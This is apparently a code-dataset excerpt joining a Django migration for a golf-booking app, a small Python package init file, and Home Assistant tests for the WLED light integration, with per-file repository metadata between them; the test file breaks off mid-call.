('thumbnail1', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 1')),
('thumbnail2', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 2')),
('thumbnail3', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 3')),
('thumbnail4', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 4')),
('thumbnail5', easy_thumbnails.fields.ThumbnailerImageField(blank=True, null=True, upload_to=booking.models.upload_directory_path, verbose_name='Thumbnail 5')),
('latitude', models.DecimalField(decimal_places=6, default=0, max_digits=9, verbose_name='Latitude')),
('longitude', models.DecimalField(decimal_places=6, default=0, max_digits=9, verbose_name='Longitude')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
('status', models.IntegerField(choices=[(0, 'Club open'), (1, 'Club closed')], db_index=True, default=0, verbose_name='Club status')),
],
options={
'verbose_name': 'Golf club',
'verbose_name_plural': 'Golf clubs',
},
),
migrations.CreateModel(
name='ClubList',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='Club list title')),
('code', models.CharField(max_length=255, verbose_name='Club list code')),
],
options={
'verbose_name': 'Golf club list',
'verbose_name_plural': 'Golf club lists',
},
),
migrations.CreateModel(
name='ClubOrderListMembership',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('round_date', models.DateField(db_index=True, verbose_name='Round date')),
('round_time', models.TimeField(db_index=True, verbose_name='Round time')),
('pax', models.IntegerField(default=4, verbose_name='PAX')),
('green_fee_selling_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee selling price')),
('green_fee_cost_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee cost price')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
],
options={
'verbose_name': 'Golf club order list membership',
'verbose_name_plural': 'Golf club order list membership',
},
),
migrations.CreateModel(
name='Rate',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('season_start', models.DateField(verbose_name='Season start date')),
('season_end', models.DateField(verbose_name='Season end date')),
('day_of_week', models.IntegerField(choices=[(0, 'Weekday'), (1, 'Weekend')], db_index=True, default=0, verbose_name='Day of week')),
('slot_start', models.TimeField(verbose_name='Slot start time')),
('slot_end', models.TimeField(verbose_name='Slot end time')),
('title', models.IntegerField(choices=[(0, 'Day golf'), (1, 'Day golf 1st round'), (2, 'Day golf 2nd round'), (3, 'Twilight golf'), (4, 'Night golf')], db_index=True, default=0, verbose_name='Rate title')),
('green_fee_selling_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Green fee selling price')),
('green_fee_cost_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Green fee cost price')),
('caddie_fee_selling_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Caddie fee selling price')),
('caddie_fee_cost_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Caddie fee cost price')),
('cart_fee_selling_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Cart fee selling price')),
('cart_fee_cost_price', models.DecimalField(decimal_places=2, help_text='THB', max_digits=11, verbose_name='Cart fee cost price')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
],
options={
'verbose_name': 'Service rate',
'verbose_name_plural': 'Service rates',
},
),
migrations.CreateModel(
name='Province',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(max_length=255, verbose_name='Province English name')),
('title_thai', models.CharField(max_length=255, verbose_name='Province Thai name')),
('title_korean', models.CharField(max_length=255, verbose_name='Province Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
('area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Area', verbose_name='Location area')),
],
options={
'verbose_name': 'Province',
'verbose_name_plural': 'Provinces',
},
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('is_removed', models.BooleanField(default=False)),
('order_no', models.UUIDField(default=uuid.uuid4, editable=False, unique=True, verbose_name='Booking no')),
('last_name', models.CharField(blank=True, max_length=64, verbose_name='Last name')),
('first_name', models.CharField(blank=True, max_length=64, verbose_name='First name')),
('user_agent', models.TextField(blank=True, verbose_name='User-agent')),
('accept_language', models.TextField(blank=True, verbose_name='Accept-language')),
('ip_address', models.GenericIPAddressField(verbose_name='IP address')),
('transaction_id', models.CharField(blank=True, max_length=64, verbose_name='Transaction ID')),
('status', models.IntegerField(choices=[(0, 'Booking opened'), (1, 'Booking pending'), (2, 'Booking offered'), (3, 'Payment completed'), (4, 'Booking confirmed'), (5, 'Booking unavailable'), (6, 'Payment adjustment'), (7, 'Payment adjusted'), (8, 'Refund requested'), (9, 'Refund pending'), (10, 'Refunded'), (11, 'Refunded'), (12, 'Voided')], db_index=True, default=0, verbose_name='Booking status')),
('total_selling_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total selling price')),
('total_cost_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total cost price')),
('message', models.TextField(blank=True, verbose_name='Booking message')),
('clubs', models.ManyToManyField(through='booking.ClubOrderListMembership', to='booking.Club')),
('parent', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Parent order')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Booking order',
'verbose_name_plural': 'Booking orders',
},
),
migrations.CreateModel(
name='Holiday',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title', models.CharField(max_length=255, verbose_name='Holiday name')),
('holiday', models.DateField(db_index=True, verbose_name='Holiday day')),
('country', models.IntegerField(choices=[(1, 'Thailand'), (2, 'South Korea'), (3, 'Japan'), (4, 'China')], db_index=True, default=1, verbose_name='Country code')),
],
options={
'verbose_name': 'Holiday',
'verbose_name_plural': 'Holidays',
'unique_together': {('holiday', 'country')},
},
),
migrations.CreateModel(
name='District',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('title_english', models.CharField(max_length=255, verbose_name='District English name')),
('title_thai', models.CharField(max_length=255, verbose_name='District Thai name')),
('title_korean', models.CharField(max_length=255, verbose_name='District Korean name')),
('slug', models.SlugField(allow_unicode=True, help_text='A short label containing only letters, numbers, underscores or hyphens for URL', max_length=255, unique=True, verbose_name='Slug')),
('position', models.IntegerField(db_index=True, default=0, verbose_name='Position')),
('province', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Province', verbose_name='Province')),
],
options={
'verbose_name': 'District',
'verbose_name_plural': 'Districts',
},
),
migrations.AddField(
model_name='cluborderlistmembership',
name='order',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Order'),
),
migrations.CreateModel(
name='ClubOrderChangeLog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('status', models.IntegerField(choices=[(0, 'Booking opened'), (1, 'Booking pending'), (2, 'Booking offered'), (3, 'Payment completed'), (4, 'Booking confirmed'), (5, 'Booking unavailable'), (6, 'Payment adjustment'), (7, 'Payment adjusted'), (8, 'Refund requested'), (9, 'Refund pending'), (10, 'Refunded'), (11, 'Refunded'), (12, 'Voided')], db_index=True, default=0, verbose_name='Booking status')),
('total_selling_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total selling price')),
('total_cost_price', models.DecimalField(decimal_places=0, default=0, max_digits=11, verbose_name='Total cost price')),
('round_date', models.DateField(db_index=True, verbose_name='Round date')),
('round_time', models.TimeField(db_index=True, verbose_name='Round time')),
('pax', models.IntegerField(default=4, verbose_name='PAX')),
('green_fee_selling_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee selling price')),
('green_fee_cost_price', models.DecimalField(decimal_places=0, default=0, help_text='THB', max_digits=11, verbose_name='Green fee cost price')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
('order', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Order')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, verbose_name='User')),
],
options={
'verbose_name': 'Golf club order changelog',
'verbose_name_plural': 'Golf club order changelog',
},
),
migrations.CreateModel(
name='ClubListMembership',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('position', models.IntegerField(verbose_name='Position')),
('club', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Club', verbose_name='Golf club')),
('club_list', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.ClubList', verbose_name='Golf club list')),
],
options={
'verbose_name': 'Golf club list membership',
'verbose_name_plural': 'Golf club list membership',
},
),
migrations.AddField(
model_name='clublist',
name='clubs',
field=models.ManyToManyField(through='booking.ClubListMembership', to='booking.Club'),
),
migrations.AddField(
model_name='club',
name='district',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.District', verbose_name='District'),
),
migrations.CreateModel(
name='AssetTransaction',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('category', models.IntegerField(choices=[(0, 'Payment'), (1, 'Refund'), (2, 'Purchase'), (3, 'Purchase cancel'), (4, 'Transfer payment'), (5, 'Gains'), (6, 'Expense')], db_index=True, default=0, verbose_name='Transaction category')),
('amount', models.DecimalField(decimal_places=0, max_digits=11, verbose_name='Amount')),
('transaction_date', models.DateTimeField(verbose_name='Transaction date')),
('remarks', models.TextField(blank=True, verbose_name='Remarks')),
('asset', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='booking.Asset', verbose_name='Asset')),
('order', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='booking.Order', verbose_name='Order')),
],
options={
'verbose_name': 'Asset transaction',
'verbose_name_plural': 'Asset transactions',
},
),
]
| 79.284281 | 418 | 0.640344 | 2,629 | 23,706 | 5.586154 | 0.100799 | 0.126583 | 0.038132 | 0.038949 | 0.778292 | 0.761337 | 0.733964 | 0.711153 | 0.7038 | 0.679014 | 0 | 0.014602 | 0.214207 | 23,706 | 298 | 419 | 79.550336 | 0.773781 | 0.001898 | 0 | 0.474227 | 1 | 0 | 0.218817 | 0.016822 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.003436 | 0.027491 | 0 | 0.041237 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c374c310870b3676411eeeeeb618096b62ec168e | 247 | py | Python | robowflex_visualization/robowflex_visualization/__init__.py | servetb/robowflex | 4444fd75e0c6d32a3b9b8e8da6ee69869e56fd3e | [
"BSD-3-Clause"
] | 58 | 2018-08-17T14:26:02.000Z | 2022-03-28T05:42:03.000Z | robowflex_visualization/robowflex_visualization/__init__.py | servetb/robowflex | 4444fd75e0c6d32a3b9b8e8da6ee69869e56fd3e | [
"BSD-3-Clause"
] | 52 | 2018-08-23T01:33:04.000Z | 2022-03-28T15:54:13.000Z | robowflex_visualization/robowflex_visualization/__init__.py | servetb/robowflex | 4444fd75e0c6d32a3b9b8e8da6ee69869e56fd3e | [
"BSD-3-Clause"
] | 14 | 2021-04-05T23:49:55.000Z | 2022-03-21T00:18:16.000Z | __all__ = ["robot", "scene", "primitives", "utils"]
import robowflex_visualization.robot as robot
import robowflex_visualization.scene as scene
import robowflex_visualization.primitives as primitives
import robowflex_visualization.utils as utils
| 35.285714 | 55 | 0.834008 | 29 | 247 | 6.827586 | 0.310345 | 0.30303 | 0.565657 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.093117 | 247 | 6 | 56 | 41.166667 | 0.883929 | 0 | 0 | 0 | 0 | 0 | 0.101215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c37f28a882ecf99eb9a0a6d8071c997355a1a4dc | 17,875 | py | Python | tests/components/wled/test_light.py | RyuzakiKK/core | 3276666457c985738ffb255fd1e959c4d58433db | [
"Apache-2.0"
] | null | null | null | tests/components/wled/test_light.py | RyuzakiKK/core | 3276666457c985738ffb255fd1e959c4d58433db | [
"Apache-2.0"
] | null | null | null | tests/components/wled/test_light.py | RyuzakiKK/core | 3276666457c985738ffb255fd1e959c4d58433db | [
"Apache-2.0"
] | null | null | null | """Tests for the WLED light platform."""
import json
from unittest.mock import MagicMock
import pytest
from wled import Device as WLEDDevice, WLEDConnectionError, WLEDError
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_EFFECT,
ATTR_HS_COLOR,
ATTR_RGB_COLOR,
ATTR_RGBW_COLOR,
ATTR_TRANSITION,
DOMAIN as LIGHT_DOMAIN,
)
from homeassistant.components.wled.const import (
ATTR_INTENSITY,
ATTR_PALETTE,
ATTR_PLAYLIST,
ATTR_PRESET,
ATTR_REVERSE,
ATTR_SPEED,
DOMAIN,
SCAN_INTERVAL,
SERVICE_EFFECT,
SERVICE_PRESET,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
ATTR_ICON,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_ON,
STATE_UNAVAILABLE,
)
from homeassistant.core import HomeAssistant
from homeassistant.helpers import entity_registry as er
import homeassistant.util.dt as dt_util
from tests.common import MockConfigEntry, async_fire_time_changed, load_fixture
async def test_rgb_light_state(
hass: HomeAssistant, init_integration: MockConfigEntry
) -> None:
"""Test the creation and values of the WLED lights."""
entity_registry = er.async_get(hass)
# First segment of the strip
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Solid"
assert state.attributes.get(ATTR_HS_COLOR) == (37.412, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 128
assert state.attributes.get(ATTR_PALETTE) == "Default"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_REVERSE) is False
assert state.attributes.get(ATTR_SPEED) == 32
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_segment_0")
assert entry
assert entry.unique_id == "aabbccddeeff_0"
# Second segment of the strip
state = hass.states.get("light.wled_rgb_light_segment_1")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.attributes.get(ATTR_EFFECT) == "Blink"
assert state.attributes.get(ATTR_HS_COLOR) == (148.941, 100.0)
assert state.attributes.get(ATTR_ICON) == "mdi:led-strip-variant"
assert state.attributes.get(ATTR_INTENSITY) == 64
assert state.attributes.get(ATTR_PALETTE) == "Random Cycle"
assert state.attributes.get(ATTR_PLAYLIST) is None
assert state.attributes.get(ATTR_PRESET) is None
assert state.attributes.get(ATTR_REVERSE) is False
assert state.attributes.get(ATTR_SPEED) == 16
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_segment_1")
assert entry
assert entry.unique_id == "aabbccddeeff_1"
# Test master control of the lightstrip
state = hass.states.get("light.wled_rgb_light_master")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 127
assert state.state == STATE_ON
entry = entity_registry.async_get("light.wled_rgb_light_master")
assert entry
assert entry.unique_id == "aabbccddeeff"
async def test_segment_change_state(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test the change of state of the WLED segments."""
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(
on=False,
segment_id=0,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_EFFECT: "Chase",
ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0",
ATTR_RGB_COLOR: [255, 0, 0],
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 2
mock_wled.segment.assert_called_with(
brightness=42,
color_primary=(255, 0, 0),
effect="Chase",
on=True,
segment_id=0,
transition=50,
)
async def test_master_change_state(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test the change of state of the WLED master light control."""
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_master", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 1
mock_wled.master.assert_called_with(
on=False,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_ENTITY_ID: "light.wled_rgb_light_master",
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 2
mock_wled.master.assert_called_with(
brightness=42,
on=True,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_master", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 3
mock_wled.master.assert_called_with(
on=False,
transition=50,
)
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_BRIGHTNESS: 42,
ATTR_ENTITY_ID: "light.wled_rgb_light_master",
ATTR_TRANSITION: 5,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 4
mock_wled.master.assert_called_with(
brightness=42,
on=True,
transition=50,
)
async def test_dynamically_handle_segments(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test if a new/deleted segment is dynamically added/removed."""
assert hass.states.get("light.wled_rgb_light_master")
assert hass.states.get("light.wled_rgb_light_segment_0")
assert hass.states.get("light.wled_rgb_light_segment_1")
return_value = mock_wled.update.return_value
mock_wled.update.return_value = WLEDDevice(
json.loads(load_fixture("wled/rgb_single_segment.json"))
)
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
assert hass.states.get("light.wled_rgb_light_segment_0")
assert not hass.states.get("light.wled_rgb_light_segment_1")
assert not hass.states.get("light.wled_rgb_light_master")
# Test adding if segment shows up again, including the master entity
mock_wled.update.return_value = return_value
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
assert hass.states.get("light.wled_rgb_light_master")
assert hass.states.get("light.wled_rgb_light_segment_0")
assert hass.states.get("light.wled_rgb_light_segment_1")
@pytest.mark.parametrize("mock_wled", ["wled/rgb_single_segment.json"], indirect=True)
async def test_single_segment_behavior(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
) -> None:
"""Test the behavior of the integration with a single segment."""
device = mock_wled.update.return_value
assert not hass.states.get("light.wled_rgb_light_master")
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.state == STATE_ON
# Test segment brightness takes master into account
device.state.brightness = 100
device.state.segments[0].brightness = 255
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.attributes.get(ATTR_BRIGHTNESS) == 100
# Test segment is off when master is off
device.state.on = False
async_fire_time_changed(hass, dt_util.utcnow() + SCAN_INTERVAL)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light")
assert state
assert state.state == STATE_OFF
# Test master is turned off when turning off a single segment
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light", ATTR_TRANSITION: 5},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.master.call_count == 1
mock_wled.master.assert_called_with(
on=False,
transition=50,
)
# Test master is turned on when turning on a single segment, and segment
# brightness is set to 255.
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_ON,
{
ATTR_ENTITY_ID: "light.wled_rgb_light",
ATTR_TRANSITION: 5,
ATTR_BRIGHTNESS: 42,
},
blocking=True,
)
await hass.async_block_till_done()
assert mock_wled.segment.call_count == 1
assert mock_wled.master.call_count == 2
mock_wled.segment.assert_called_with(on=True, segment_id=0, brightness=255)
mock_wled.master.assert_called_with(on=True, transition=50, brightness=42)
async def test_light_error(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
caplog: pytest.LogCaptureFixture,
) -> None:
"""Test error handling of the WLED lights."""
mock_wled.segment.side_effect = WLEDError
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.state == STATE_ON
assert "Invalid response from API" in caplog.text
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(on=False, segment_id=0)
async def test_light_connection_error(
hass: HomeAssistant,
init_integration: MockConfigEntry,
mock_wled: MagicMock,
caplog: pytest.LogCaptureFixture,
) -> None:
"""Test error handling of the WLED switches."""
mock_wled.segment.side_effect = WLEDConnectionError
await hass.services.async_call(
LIGHT_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: "light.wled_rgb_light_segment_0"},
blocking=True,
)
await hass.async_block_till_done()
state = hass.states.get("light.wled_rgb_light_segment_0")
assert state
assert state.state == STATE_UNAVAILABLE
assert "Error communicating with API" in caplog.text
assert mock_wled.segment.call_count == 1
mock_wled.segment.assert_called_with(on=False, segment_id=0)
@pytest.mark.parametrize("mock_wled", ["wled/rgbw.json"], indirect=True)
async def test_rgbw_light(
    hass: HomeAssistant, init_integration: MockConfigEntry, mock_wled: MagicMock
) -> None:
    """Test RGBW support for WLED."""
    entity_id = "light.wled_rgbw_light"

    # The RGBW fixture device starts on, reporting its RGBW color.
    light_state = hass.states.get(entity_id)
    assert light_state
    assert light_state.state == STATE_ON
    assert light_state.attributes.get(ATTR_RGBW_COLOR) == (255, 0, 0, 139)

    await hass.services.async_call(
        LIGHT_DOMAIN,
        SERVICE_TURN_ON,
        {ATTR_ENTITY_ID: entity_id, ATTR_RGBW_COLOR: (255, 255, 255, 255)},
        blocking=True,
    )
    await hass.async_block_till_done()

    # The requested RGBW color is forwarded to the device as color_primary.
    assert mock_wled.segment.call_count == 1
    mock_wled.segment.assert_called_with(
        color_primary=(255, 255, 255, 255),
        on=True,
        segment_id=0,
    )
async def test_effect_service(
    hass: HomeAssistant, init_integration: MockConfigEntry, mock_wled: MagicMock
) -> None:
    """Test the effect service of a WLED light.

    Exercises the service with every combination of optional parameters
    (effect, intensity, palette, reverse, speed) and checks that exactly
    the provided ones are forwarded to the device call.
    """
    entity_id = "light.wled_rgb_light_segment_0"
    # Each case: (service data minus the entity id,
    #             expected kwargs of the resulting segment() call).
    cases = [
        (
            {
                ATTR_EFFECT: "Rainbow",
                ATTR_INTENSITY: 200,
                ATTR_PALETTE: "Tiamat",
                ATTR_REVERSE: True,
                ATTR_SPEED: 100,
            },
            {
                "effect": "Rainbow",
                "intensity": 200,
                "palette": "Tiamat",
                "reverse": True,
                "segment_id": 0,
                "speed": 100,
            },
        ),
        # Numeric effect id, no other parameters.
        ({ATTR_EFFECT: 9}, {"segment_id": 0, "effect": 9}),
        # No effect given.
        (
            {ATTR_INTENSITY: 200, ATTR_REVERSE: True, ATTR_SPEED: 100},
            {"intensity": 200, "reverse": True, "segment_id": 0, "speed": 100},
        ),
        # No intensity given.
        (
            {
                ATTR_EFFECT: "Rainbow",
                ATTR_PALETTE: "Tiamat",
                ATTR_REVERSE: True,
                ATTR_SPEED: 100,
            },
            {
                "effect": "Rainbow",
                "palette": "Tiamat",
                "reverse": True,
                "segment_id": 0,
                "speed": 100,
            },
        ),
        # No reverse given.
        (
            {ATTR_EFFECT: "Rainbow", ATTR_INTENSITY: 200, ATTR_SPEED: 100},
            {"effect": "Rainbow", "intensity": 200, "segment_id": 0, "speed": 100},
        ),
        # No speed given.
        (
            {ATTR_EFFECT: "Rainbow", ATTR_INTENSITY: 200, ATTR_REVERSE: True},
            {"effect": "Rainbow", "intensity": 200, "reverse": True, "segment_id": 0},
        ),
    ]

    for expected_count, (service_data, expected_kwargs) in enumerate(cases, 1):
        await hass.services.async_call(
            DOMAIN,
            SERVICE_EFFECT,
            {ATTR_ENTITY_ID: entity_id, **service_data},
            blocking=True,
        )
        await hass.async_block_till_done()
        assert mock_wled.segment.call_count == expected_count
        mock_wled.segment.assert_called_with(**expected_kwargs)
async def test_effect_service_error(
    hass: HomeAssistant,
    init_integration: MockConfigEntry,
    mock_wled: MagicMock,
    caplog: pytest.LogCaptureFixture,
) -> None:
    """Test error handling of the WLED effect service."""
    entity_id = "light.wled_rgb_light_segment_0"
    mock_wled.segment.side_effect = WLEDError

    await hass.services.async_call(
        DOMAIN,
        SERVICE_EFFECT,
        {ATTR_ENTITY_ID: entity_id, ATTR_EFFECT: 9},
        blocking=True,
    )
    await hass.async_block_till_done()

    # The entity state is unchanged and the API failure is logged.
    light_state = hass.states.get(entity_id)
    assert light_state
    assert light_state.state == STATE_ON
    assert "Invalid response from API" in caplog.text
    assert mock_wled.segment.call_count == 1
    mock_wled.segment.assert_called_with(effect=9, segment_id=0)
async def test_preset_service(
    hass: HomeAssistant, init_integration: MockConfigEntry, mock_wled: MagicMock
) -> None:
    """Test the preset service of a WLED light."""
    # Call the service once for a segment entity and once for the master,
    # verifying the preset number is forwarded each time.
    calls = [
        ("light.wled_rgb_light_segment_0", 1),
        ("light.wled_rgb_light_master", 2),
    ]
    for expected_count, (entity_id, preset) in enumerate(calls, 1):
        await hass.services.async_call(
            DOMAIN,
            SERVICE_PRESET,
            {ATTR_ENTITY_ID: entity_id, ATTR_PRESET: preset},
            blocking=True,
        )
        await hass.async_block_till_done()
        assert mock_wled.preset.call_count == expected_count
        mock_wled.preset.assert_called_with(preset=preset)
async def test_preset_service_error(
    hass: HomeAssistant,
    init_integration: MockConfigEntry,
    mock_wled: MagicMock,
    caplog: pytest.LogCaptureFixture,
) -> None:
    """Test error handling of the WLED preset service."""
    entity_id = "light.wled_rgb_light_segment_0"
    mock_wled.preset.side_effect = WLEDError

    await hass.services.async_call(
        DOMAIN,
        SERVICE_PRESET,
